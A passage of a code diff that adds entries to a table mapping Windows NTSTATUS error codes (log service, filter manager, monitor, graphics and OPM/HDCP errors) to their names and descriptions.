+ 0xC01A001A: ("STATUS_LOG_RECORDS_RESERVED_INVALID","The number of reserved log records or the adjustment of the number of reserved log records is invalid."),
+ 0xC01A001B: ("STATUS_LOG_SPACE_RESERVED_INVALID","The reserved log space or the adjustment of the log space is invalid."),
+ 0xC01A001C: ("STATUS_LOG_TAIL_INVALID","A new or existing archive tail or the base of the active log is invalid."),
+ 0xC01A001D: ("STATUS_LOG_FULL","The log space is exhausted."),
+ 0xC01A001E: ("STATUS_LOG_MULTIPLEXED","The log is multiplexed; no direct writes to the physical log are allowed."),
+ 0xC01A001F: ("STATUS_LOG_DEDICATED","The operation failed because the log is dedicated."),
+ 0xC01A0020: ("STATUS_LOG_ARCHIVE_NOT_IN_PROGRESS","The operation requires an archive context."),
+ 0xC01A0021: ("STATUS_LOG_ARCHIVE_IN_PROGRESS","Log archival is in progress."),
+ 0xC01A0022: ("STATUS_LOG_EPHEMERAL","The operation requires a nonephemeral log, but the log is ephemeral."),
+ 0xC01A0023: ("STATUS_LOG_NOT_ENOUGH_CONTAINERS","The log must have at least two containers before it can be read from or written to."),
+ 0xC01A0024: ("STATUS_LOG_CLIENT_ALREADY_REGISTERED","A log client has already registered on the stream."),
+ 0xC01A0025: ("STATUS_LOG_CLIENT_NOT_REGISTERED","A log client has not been registered on the stream."),
+ 0xC01A0026: ("STATUS_LOG_FULL_HANDLER_IN_PROGRESS","A request has already been made to handle the log full condition."),
+ 0xC01A0027: ("STATUS_LOG_CONTAINER_READ_FAILED","The log service encountered an error when attempting to read from a log container."),
+ 0xC01A0028: ("STATUS_LOG_CONTAINER_WRITE_FAILED","The log service encountered an error when attempting to write to a log container."),
+ 0xC01A0029: ("STATUS_LOG_CONTAINER_OPEN_FAILED","The log service encountered an error when attempting to open a log container."),
+ 0xC01A002A: ("STATUS_LOG_CONTAINER_STATE_INVALID","The log service encountered an invalid container state when attempting a requested action."),
+ 0xC01A002B: ("STATUS_LOG_STATE_INVALID","The log service is not in the correct state to perform a requested action."),
+ 0xC01A002C: ("STATUS_LOG_PINNED","The log space cannot be reclaimed because the log is pinned."),
+ 0xC01A002D: ("STATUS_LOG_METADATA_FLUSH_FAILED","The log metadata flush failed."),
+ 0xC01A002E: ("STATUS_LOG_INCONSISTENT_SECURITY","Security on the log and its containers is inconsistent."),
+ 0xC01A002F: ("STATUS_LOG_APPENDED_FLUSH_FAILED","Records were appended to the log or reservation changes were made, but the log could not be flushed."),
+ 0xC01A0030: ("STATUS_LOG_PINNED_RESERVATION","The log is pinned due to reservation consuming most of the log space. Free some reserved records to make space available."),
+ 0xC01B00EA: ("STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD","{Display Driver Stopped Responding} The %hs display driver has stopped working normally. Save your work and reboot the system to restore full display functionality. The next time you reboot the computer, a dialog box will allow you to upload data about this failure to Microsoft."),
+ 0xC01C0001: ("STATUS_FLT_NO_HANDLER_DEFINED","A handler was not defined by the filter for this operation."),
+ 0xC01C0002: ("STATUS_FLT_CONTEXT_ALREADY_DEFINED","A context is already defined for this object."),
+ 0xC01C0003: ("STATUS_FLT_INVALID_ASYNCHRONOUS_REQUEST","Asynchronous requests are not valid for this operation."),
+ 0xC01C0004: ("STATUS_FLT_DISALLOW_FAST_IO","This is an internal error code used by the filter manager to determine if a fast I/O operation should be forced down the input/output request packet (IRP) path. Minifilters should never return this value."),
+ 0xC01C0005: ("STATUS_FLT_INVALID_NAME_REQUEST","An invalid name request was made. The name requested cannot be retrieved at this time."),
+ 0xC01C0006: ("STATUS_FLT_NOT_SAFE_TO_POST_OPERATION","Posting this operation to a worker thread for further processing is not safe at this time because it could lead to a system deadlock."),
+ 0xC01C0007: ("STATUS_FLT_NOT_INITIALIZED","The Filter Manager was not initialized when a filter tried to register. Make sure that the Filter Manager is loaded as a driver."),
+ 0xC01C0008: ("STATUS_FLT_FILTER_NOT_READY","The filter is not ready for attachment to volumes because it has not finished initializing (FltStartFiltering has not been called)."),
+ 0xC01C0009: ("STATUS_FLT_POST_OPERATION_CLEANUP","The filter must clean up any operation-specific context at this time because it is being removed from the system before the operation is completed by the lower drivers."),
+ 0xC01C000A: ("STATUS_FLT_INTERNAL_ERROR","The Filter Manager had an internal error from which it cannot recover; therefore, the operation has failed. This is usually the result of a filter returning an invalid value from a pre-operation callback."),
+ 0xC01C000B: ("STATUS_FLT_DELETING_OBJECT","The object specified for this action is in the process of being deleted; therefore, the action requested cannot be completed at this time."),
+ 0xC01C000C: ("STATUS_FLT_MUST_BE_NONPAGED_POOL","A nonpaged pool must be used for this type of context."),
+ 0xC01C000D: ("STATUS_FLT_DUPLICATE_ENTRY","A duplicate handler definition has been provided for an operation."),
+ 0xC01C000E: ("STATUS_FLT_CBDQ_DISABLED","The callback data queue has been disabled."),
+ 0xC01C000F: ("STATUS_FLT_DO_NOT_ATTACH","Do not attach the filter to the volume at this time."),
+ 0xC01C0010: ("STATUS_FLT_DO_NOT_DETACH","Do not detach the filter from the volume at this time."),
+ 0xC01C0011: ("STATUS_FLT_INSTANCE_ALTITUDE_COLLISION","An instance already exists at this altitude on the volume specified."),
+ 0xC01C0012: ("STATUS_FLT_INSTANCE_NAME_COLLISION","An instance already exists with this name on the volume specified."),
+ 0xC01C0013: ("STATUS_FLT_FILTER_NOT_FOUND","The system could not find the filter specified."),
+ 0xC01C0014: ("STATUS_FLT_VOLUME_NOT_FOUND","The system could not find the volume specified."),
+ 0xC01C0015: ("STATUS_FLT_INSTANCE_NOT_FOUND","The system could not find the instance specified."),
+ 0xC01C0016: ("STATUS_FLT_CONTEXT_ALLOCATION_NOT_FOUND","No registered context allocation definition was found for the given request."),
+ 0xC01C0017: ("STATUS_FLT_INVALID_CONTEXT_REGISTRATION","An invalid parameter was specified during context registration."),
+ 0xC01C0018: ("STATUS_FLT_NAME_CACHE_MISS","The name requested was not found in the Filter Manager name cache and could not be retrieved from the file system."),
+ 0xC01C0019: ("STATUS_FLT_NO_DEVICE_OBJECT","The requested device object does not exist for the given volume."),
+ 0xC01C001A: ("STATUS_FLT_VOLUME_ALREADY_MOUNTED","The specified volume is already mounted."),
+ 0xC01C001B: ("STATUS_FLT_ALREADY_ENLISTED","The specified transaction context is already enlisted in a transaction."),
+ 0xC01C001C: ("STATUS_FLT_CONTEXT_ALREADY_LINKED","The specified context is already attached to another object."),
+ 0xC01C0020: ("STATUS_FLT_NO_WAITER_FOR_REPLY","No waiter is present for the filter's reply to this message."),
+ 0xC01D0001: ("STATUS_MONITOR_NO_DESCRIPTOR","A monitor descriptor could not be obtained."),
+ 0xC01D0002: ("STATUS_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT","This release does not support the format of the obtained monitor descriptor."),
+ 0xC01D0003: ("STATUS_MONITOR_INVALID_DESCRIPTOR_CHECKSUM","The checksum of the obtained monitor descriptor is invalid."),
+ 0xC01D0004: ("STATUS_MONITOR_INVALID_STANDARD_TIMING_BLOCK","The monitor descriptor contains an invalid standard timing block."),
+ 0xC01D0005: ("STATUS_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED","WMI data-block registration failed for one of the MSMonitorClass WMI subclasses."),
+ 0xC01D0006: ("STATUS_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK","The provided monitor descriptor block is either corrupted or does not contain the monitor's detailed serial number."),
+ 0xC01D0007: ("STATUS_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK","The provided monitor descriptor block is either corrupted or does not contain the monitor's user-friendly name."),
+ 0xC01D0008: ("STATUS_MONITOR_NO_MORE_DESCRIPTOR_DATA","There is no monitor descriptor data at the specified (offset or size) region."),
+ 0xC01D0009: ("STATUS_MONITOR_INVALID_DETAILED_TIMING_BLOCK","The monitor descriptor contains an invalid detailed timing block."),
+ 0xC01D000A: ("STATUS_MONITOR_INVALID_MANUFACTURE_DATE","Monitor descriptor contains invalid manufacture date."),
+ 0xC01E0000: ("STATUS_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER","Exclusive mode ownership is needed to create an unmanaged primary allocation."),
+ 0xC01E0001: ("STATUS_GRAPHICS_INSUFFICIENT_DMA_BUFFER","The driver needs more DMA buffer space to complete the requested operation."),
+ 0xC01E0002: ("STATUS_GRAPHICS_INVALID_DISPLAY_ADAPTER","The specified display adapter handle is invalid."),
+ 0xC01E0003: ("STATUS_GRAPHICS_ADAPTER_WAS_RESET","The specified display adapter and all of its state have been reset."),
+ 0xC01E0004: ("STATUS_GRAPHICS_INVALID_DRIVER_MODEL","The driver stack does not match the expected driver model."),
+ 0xC01E0005: ("STATUS_GRAPHICS_PRESENT_MODE_CHANGED","Present happened but ended up into the changed desktop mode."),
+ 0xC01E0006: ("STATUS_GRAPHICS_PRESENT_OCCLUDED","Nothing to present due to desktop occlusion."),
+ 0xC01E0007: ("STATUS_GRAPHICS_PRESENT_DENIED","Not able to present due to denial of desktop access."),
+ 0xC01E0008: ("STATUS_GRAPHICS_CANNOTCOLORCONVERT","Not able to present with color conversion."),
+ 0xC01E000B: ("STATUS_GRAPHICS_PRESENT_REDIRECTION_DISABLED","Present redirection is disabled (desktop windowing management subsystem is off)."),
+ 0xC01E000C: ("STATUS_GRAPHICS_PRESENT_UNOCCLUDED","Previous exclusive VidPn source owner has released its ownership"),
+ 0xC01E0100: ("STATUS_GRAPHICS_NO_VIDEO_MEMORY","Not enough video memory is available to complete the operation."),
+ 0xC01E0101: ("STATUS_GRAPHICS_CANT_LOCK_MEMORY","Could not probe and lock the underlying memory of an allocation."),
+ 0xC01E0102: ("STATUS_GRAPHICS_ALLOCATION_BUSY","The allocation is currently busy."),
+ 0xC01E0103: ("STATUS_GRAPHICS_TOO_MANY_REFERENCES","An object being referenced has already reached the maximum reference count and cannot be referenced further."),
+ 0xC01E0104: ("STATUS_GRAPHICS_TRY_AGAIN_LATER","A problem could not be solved due to an existing condition. Try again later."),
+ 0xC01E0105: ("STATUS_GRAPHICS_TRY_AGAIN_NOW","A problem could not be solved due to an existing condition. Try again now."),
+ 0xC01E0106: ("STATUS_GRAPHICS_ALLOCATION_INVALID","The allocation is invalid."),
+ 0xC01E0107: ("STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE","No more unswizzling apertures are currently available."),
+ 0xC01E0108: ("STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED","The current allocation cannot be unswizzled by an aperture."),
+ 0xC01E0109: ("STATUS_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION","The request failed because a pinned allocation cannot be evicted."),
+ 0xC01E0110: ("STATUS_GRAPHICS_INVALID_ALLOCATION_USAGE","The allocation cannot be used from its current segment location for the specified operation."),
+ 0xC01E0111: ("STATUS_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION","A locked allocation cannot be used in the current command buffer."),
+ 0xC01E0112: ("STATUS_GRAPHICS_ALLOCATION_CLOSED","The allocation being referenced has been closed permanently."),
+ 0xC01E0113: ("STATUS_GRAPHICS_INVALID_ALLOCATION_INSTANCE","An invalid allocation instance is being referenced."),
+ 0xC01E0114: ("STATUS_GRAPHICS_INVALID_ALLOCATION_HANDLE","An invalid allocation handle is being referenced."),
+ 0xC01E0115: ("STATUS_GRAPHICS_WRONG_ALLOCATION_DEVICE","The allocation being referenced does not belong to the current device."),
+ 0xC01E0116: ("STATUS_GRAPHICS_ALLOCATION_CONTENT_LOST","The specified allocation lost its content."),
+ 0xC01E0200: ("STATUS_GRAPHICS_GPU_EXCEPTION_ON_DEVICE","A GPU exception was detected on the given device. The device cannot be scheduled."),
+ 0xC01E0300: ("STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY","The specified VidPN topology is invalid."),
+ 0xC01E0301: ("STATUS_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED","The specified VidPN topology is valid but is not supported by this model of the display adapter."),
+ 0xC01E0302: ("STATUS_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED","The specified VidPN topology is valid but is not currently supported by the display adapter due to allocation of its resources."),
+ 0xC01E0303: ("STATUS_GRAPHICS_INVALID_VIDPN","The specified VidPN handle is invalid."),
+ 0xC01E0304: ("STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE","The specified video present source is invalid."),
+ 0xC01E0305: ("STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET","The specified video present target is invalid."),
+ 0xC01E0306: ("STATUS_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED","The specified VidPN modality is not supported (for example, at least two of the pinned modes are not co-functional)."),
+ 0xC01E0308: ("STATUS_GRAPHICS_INVALID_VIDPN_SOURCEMODESET","The specified VidPN source mode set is invalid."),
+ 0xC01E0309: ("STATUS_GRAPHICS_INVALID_VIDPN_TARGETMODESET","The specified VidPN target mode set is invalid."),
+ 0xC01E030A: ("STATUS_GRAPHICS_INVALID_FREQUENCY","The specified video signal frequency is invalid."),
+ 0xC01E030B: ("STATUS_GRAPHICS_INVALID_ACTIVE_REGION","The specified video signal active region is invalid."),
+ 0xC01E030C: ("STATUS_GRAPHICS_INVALID_TOTAL_REGION","The specified video signal total region is invalid."),
+ 0xC01E0310: ("STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE","The specified video present source mode is invalid."),
+ 0xC01E0311: ("STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE","The specified video present target mode is invalid."),
+ 0xC01E0312: ("STATUS_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET","The pinned mode must remain in the set on the VidPN's co-functional modality enumeration."),
+ 0xC01E0313: ("STATUS_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY","The specified video present path is already in the VidPN's topology."),
+ 0xC01E0314: ("STATUS_GRAPHICS_MODE_ALREADY_IN_MODESET","The specified mode is already in the mode set."),
+ 0xC01E0315: ("STATUS_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET","The specified video present source set is invalid."),
+ 0xC01E0316: ("STATUS_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET","The specified video present target set is invalid."),
+ 0xC01E0317: ("STATUS_GRAPHICS_SOURCE_ALREADY_IN_SET","The specified video present source is already in the video present source set."),
+ 0xC01E0318: ("STATUS_GRAPHICS_TARGET_ALREADY_IN_SET","The specified video present target is already in the video present target set."),
+ 0xC01E0319: ("STATUS_GRAPHICS_INVALID_VIDPN_PRESENT_PATH","The specified VidPN present path is invalid."),
+ 0xC01E031A: ("STATUS_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY","The miniport has no recommendation for augmenting the specified VidPN's topology."),
+ 0xC01E031B: ("STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET","The specified monitor frequency range set is invalid."),
+ 0xC01E031C: ("STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE","The specified monitor frequency range is invalid."),
+ 0xC01E031D: ("STATUS_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET","The specified frequency range is not in the specified monitor frequency range set."),
+ 0xC01E031F: ("STATUS_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET","The specified frequency range is already in the specified monitor frequency range set."),
+ 0xC01E0320: ("STATUS_GRAPHICS_STALE_MODESET","The specified mode set is stale. Reacquire the new mode set."),
+ 0xC01E0321: ("STATUS_GRAPHICS_INVALID_MONITOR_SOURCEMODESET","The specified monitor source mode set is invalid."),
+ 0xC01E0322: ("STATUS_GRAPHICS_INVALID_MONITOR_SOURCE_MODE","The specified monitor source mode is invalid."),
+ 0xC01E0323: ("STATUS_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN","The miniport does not have a recommendation regarding the request to provide a functional VidPN given the current display adapter configuration."),
+ 0xC01E0324: ("STATUS_GRAPHICS_MODE_ID_MUST_BE_UNIQUE","The ID of the specified mode is being used by another mode in the set."),
+ 0xC01E0325: ("STATUS_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION","The system failed to determine a mode that is supported by both the display adapter and the monitor connected to it."),
+ 0xC01E0326: ("STATUS_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES","The number of video present targets must be greater than or equal to the number of video present sources."),
+ 0xC01E0327: ("STATUS_GRAPHICS_PATH_NOT_IN_TOPOLOGY","The specified present path is not in the VidPN's topology."),
+ 0xC01E0328: ("STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE","The display adapter must have at least one video present source."),
+ 0xC01E0329: ("STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET","The display adapter must have at least one video present target."),
+ 0xC01E032A: ("STATUS_GRAPHICS_INVALID_MONITORDESCRIPTORSET","The specified monitor descriptor set is invalid."),
+ 0xC01E032B: ("STATUS_GRAPHICS_INVALID_MONITORDESCRIPTOR","The specified monitor descriptor is invalid."),
+ 0xC01E032C: ("STATUS_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET","The specified descriptor is not in the specified monitor descriptor set."),
+ 0xC01E032D: ("STATUS_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET","The specified descriptor is already in the specified monitor descriptor set."),
+ 0xC01E032E: ("STATUS_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE","The ID of the specified monitor descriptor is being used by another descriptor in the set."),
+ 0xC01E032F: ("STATUS_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE","The specified video present target subset type is invalid."),
+ 0xC01E0330: ("STATUS_GRAPHICS_RESOURCES_NOT_RELATED","Two or more of the specified resources are not related to each other, as defined by the interface semantics."),
+ 0xC01E0331: ("STATUS_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE","The ID of the specified video present source is being used by another source in the set."),
+ 0xC01E0332: ("STATUS_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE","The ID of the specified video present target is being used by another target in the set."),
+ 0xC01E0333: ("STATUS_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET","The specified VidPN source cannot be used because there is no available VidPN target to connect it to."),
+ 0xC01E0334: ("STATUS_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER","The newly arrived monitor could not be associated with a display adapter."),
+ 0xC01E0335: ("STATUS_GRAPHICS_NO_VIDPNMGR","The particular display adapter does not have an associated VidPN manager."),
+ 0xC01E0336: ("STATUS_GRAPHICS_NO_ACTIVE_VIDPN","The VidPN manager of the particular display adapter does not have an active VidPN."),
+ 0xC01E0337: ("STATUS_GRAPHICS_STALE_VIDPN_TOPOLOGY","The specified VidPN topology is stale; obtain the new topology."),
+ 0xC01E0338: ("STATUS_GRAPHICS_MONITOR_NOT_CONNECTED","No monitor is connected on the specified video present target."),
+ 0xC01E0339: ("STATUS_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY","The specified source is not part of the specified VidPN's topology."),
+ 0xC01E033A: ("STATUS_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE","The specified primary surface size is invalid."),
+ 0xC01E033B: ("STATUS_GRAPHICS_INVALID_VISIBLEREGION_SIZE","The specified visible region size is invalid."),
+ 0xC01E033C: ("STATUS_GRAPHICS_INVALID_STRIDE","The specified stride is invalid."),
+ 0xC01E033D: ("STATUS_GRAPHICS_INVALID_PIXELFORMAT","The specified pixel format is invalid."),
+ 0xC01E033E: ("STATUS_GRAPHICS_INVALID_COLORBASIS","The specified color basis is invalid."),
+ 0xC01E033F: ("STATUS_GRAPHICS_INVALID_PIXELVALUEACCESSMODE","The specified pixel value access mode is invalid."),
+ 0xC01E0340: ("STATUS_GRAPHICS_TARGET_NOT_IN_TOPOLOGY","The specified target is not part of the specified VidPN's topology."),
+ 0xC01E0341: ("STATUS_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT","Failed to acquire the display mode management interface."),
+ 0xC01E0342: ("STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE","The specified VidPN source is already owned by a DMM client and cannot be used until that client releases it."),
+ 0xC01E0343: ("STATUS_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN","The specified VidPN is active and cannot be accessed."),
+ 0xC01E0344: ("STATUS_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL","The specified VidPN's present path importance ordinal is invalid."),
+ 0xC01E0345: ("STATUS_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION","The specified VidPN's present path content geometry transformation is invalid."),
+ 0xC01E0346: ("STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED","The specified content geometry transformation is not supported on the respective VidPN present path."),
+ 0xC01E0347: ("STATUS_GRAPHICS_INVALID_GAMMA_RAMP","The specified gamma ramp is invalid."),
+ 0xC01E0348: ("STATUS_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED","The specified gamma ramp is not supported on the respective VidPN present path."),
+ 0xC01E0349: ("STATUS_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED","Multisampling is not supported on the respective VidPN present path."),
+ 0xC01E034A: ("STATUS_GRAPHICS_MODE_NOT_IN_MODESET","The specified mode is not in the specified mode set."),
+ 0xC01E034D: ("STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON","The specified VidPN topology recommendation reason is invalid."),
+ 0xC01E034E: ("STATUS_GRAPHICS_INVALID_PATH_CONTENT_TYPE","The specified VidPN present path content type is invalid."),
+ 0xC01E034F: ("STATUS_GRAPHICS_INVALID_COPYPROTECTION_TYPE","The specified VidPN present path copy protection type is invalid."),
+ 0xC01E0350: ("STATUS_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS","Only one unassigned mode set can exist at any one time for a particular VidPN source or target."),
+ 0xC01E0352: ("STATUS_GRAPHICS_INVALID_SCANLINE_ORDERING","The specified scan line ordering type is invalid."),
+ 0xC01E0353: ("STATUS_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED","The topology changes are not allowed for the specified VidPN."),
+ 0xC01E0354: ("STATUS_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS","All available importance ordinals are being used in the specified topology."),
+ 0xC01E0355: ("STATUS_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT","The specified primary surface has a different private-format attribute than the current primary surface."),
+ 0xC01E0356: ("STATUS_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM","The specified mode-pruning algorithm is invalid."),
+ 0xC01E0357: ("STATUS_GRAPHICS_INVALID_MONITOR_CAPABILITY_ORIGIN","The specified monitor-capability origin is invalid."),
+ 0xC01E0358: ("STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE_CONSTRAINT","The specified monitor-frequency range constraint is invalid."),
+ 0xC01E0359: ("STATUS_GRAPHICS_MAX_NUM_PATHS_REACHED","The maximum supported number of present paths has been reached."),
+ 0xC01E035A: ("STATUS_GRAPHICS_CANCEL_VIDPN_TOPOLOGY_AUGMENTATION","The miniport requested that augmentation be canceled for the specified source of the specified VidPN's topology."),
+ 0xC01E035B: ("STATUS_GRAPHICS_INVALID_CLIENT_TYPE","The specified client type was not recognized."),
+ 0xC01E035C: ("STATUS_GRAPHICS_CLIENTVIDPN_NOT_SET","The client VidPN is not set on this adapter (for example, no user mode-initiated mode changes have taken place on this adapter)."),
+ 0xC01E0400: ("STATUS_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED","The specified display adapter child device already has an external device connected to it."),
+ 0xC01E0401: ("STATUS_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED","The display adapter child device does not support reporting a descriptor."),
+ 0xC01E0430: ("STATUS_GRAPHICS_NOT_A_LINKED_ADAPTER","The display adapter is not linked to any other adapters."),
+ 0xC01E0431: ("STATUS_GRAPHICS_LEADLINK_NOT_ENUMERATED","The lead adapter in a linked configuration was not enumerated yet."),
+ 0xC01E0432: ("STATUS_GRAPHICS_CHAINLINKS_NOT_ENUMERATED","Some chain adapters in a linked configuration have not yet been enumerated."),
+ 0xC01E0433: ("STATUS_GRAPHICS_ADAPTER_CHAIN_NOT_READY","The chain of linked adapters is not ready to start because of an unknown failure."),
+ 0xC01E0434: ("STATUS_GRAPHICS_CHAINLINKS_NOT_STARTED","An attempt was made to start a lead link display adapter when the chain links had not yet started."),
+ 0xC01E0435: ("STATUS_GRAPHICS_CHAINLINKS_NOT_POWERED_ON","An attempt was made to turn on a lead link display adapter when the chain links were turned off."),
+ 0xC01E0436: ("STATUS_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE","The adapter link was found in an inconsistent state. Not all adapters are in an expected PNP/power state."),
+ 0xC01E0438: ("STATUS_GRAPHICS_NOT_POST_DEVICE_DRIVER","The driver trying to start is not the same as the driver for the posted display adapter."),
+ 0xC01E043B: ("STATUS_GRAPHICS_ADAPTER_ACCESS_NOT_EXCLUDED","An operation is being attempted that requires the display adapter to be in a quiescent state."),
+ 0xC01E0500: ("STATUS_GRAPHICS_OPM_NOT_SUPPORTED","The driver does not support OPM."),
+ 0xC01E0501: ("STATUS_GRAPHICS_COPP_NOT_SUPPORTED","The driver does not support COPP."),
+ 0xC01E0502: ("STATUS_GRAPHICS_UAB_NOT_SUPPORTED","The driver does not support UAB."),
+ 0xC01E0503: ("STATUS_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS","The specified encrypted parameters are invalid."),
+ 0xC01E0504: ("STATUS_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL","An array passed to a function cannot hold all of the data that the function wants to put in it."),
+ 0xC01E0505: ("STATUS_GRAPHICS_OPM_NO_PROTECTED_OUTPUTS_EXIST","The GDI display device passed to this function does not have any active protected outputs."),
+ 0xC01E0506: ("STATUS_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME","The PVP cannot find an actual GDI display device that corresponds to the passed-in GDI display device name."),
+ 0xC01E0507: ("STATUS_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP","This function failed because the GDI display device passed to it was not attached to the Windows desktop."),
+ 0xC01E0508: ("STATUS_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED","The PVP does not support mirroring display devices because they do not have any protected outputs."),
+ 0xC01E050A: ("STATUS_GRAPHICS_OPM_INVALID_POINTER","The function failed because an invalid pointer parameter was passed to it. A pointer parameter is invalid if it is null, is not correctly aligned, or it points to an invalid address or a kernel mode address."),
+ 0xC01E050B: ("STATUS_GRAPHICS_OPM_INTERNAL_ERROR","An internal error caused an operation to fail."),
+ 0xC01E050C: ("STATUS_GRAPHICS_OPM_INVALID_HANDLE","The function failed because the caller passed in an invalid OPM user-mode handle."),
+ 0xC01E050D: ("STATUS_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE","This function failed because the GDI device passed to it did not have any monitors associated with it."),
+ 0xC01E050E: ("STATUS_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH","A certificate could not be returned because the certificate buffer passed to the function was too small."),
+ 0xC01E050F: ("STATUS_GRAPHICS_OPM_SPANNING_MODE_ENABLED","DxgkDdiOpmCreateProtectedOutput() could not create a protected output because the video present yarget is in spanning mode."),
+ 0xC01E0510: ("STATUS_GRAPHICS_OPM_THEATER_MODE_ENABLED","DxgkDdiOpmCreateProtectedOutput() could not create a protected output because the video present target is in theater mode."),
+ 0xC01E0511: ("STATUS_GRAPHICS_PVP_HFS_FAILED","The function call failed because the display adapter's hardware functionality scan (HFS) failed to validate the graphics hardware."),
+ 0xC01E0512: ("STATUS_GRAPHICS_OPM_INVALID_SRM","The HDCP SRM passed to this function did not comply with section 5 of the HDCP 1.1 specification."),
+ 0xC01E0513: ("STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP","The protected output cannot enable the HDCP system because it does not support it."),
+ 0xC01E0514: ("STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP","The protected output cannot enable analog copy protection because it does not support it."),
+ 0xC01E0515: ("STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA","The protected output cannot enable the CGMS-A protection technology because it does not support it."),
+ 0xC01E0516: ("STATUS_GRAPHICS_OPM_HDCP_SRM_NEVER_SET","DxgkDdiOPMGetInformation() cannot return the version of the SRM being used because the application never successfully passed an SRM to the protected output."),
+ 0xC01E0517: ("STATUS_GRAPHICS_OPM_RESOLUTION_TOO_HIGH","DxgkDdiOPMConfigureProtectedOutput() cannot enable the specified output protection technology because the output's screen resolution is too high."),
+ 0xC01E0518: ("STATUS_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE","DxgkDdiOPMConfigureProtectedOutput() cannot enable HDCP because other physical outputs are using the display adapter's HDCP hardware."),
+ 0xC01E051A: ("STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_NO_LONGER_EXISTS","The operating system asynchronously destroyed this OPM-protected output because the operating system state changed. This error typically occurs because the monitor PDO associated with this protected output was removed or stopped, the protected output's session became a nonconsole session, or the protected output's desktop became inactive."),
+ 0xC01E051B: ("STATUS_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS","OPM functions cannot be called when a session is changing its type. Three types of sessions currently exist: console, disconnected, and remote (RDP or ICA)."),
